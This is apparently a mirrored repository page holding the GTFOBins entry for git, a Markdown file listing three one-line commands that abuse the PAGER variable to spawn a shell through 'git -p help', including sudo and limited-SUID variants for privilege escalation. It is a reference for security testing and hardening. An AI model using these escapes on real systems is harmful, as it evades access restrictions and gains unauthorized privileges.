1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/git.md
2018-10-05 18:55:38 +01:00

10 lines
221 B
Markdown

---
functions:
shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
---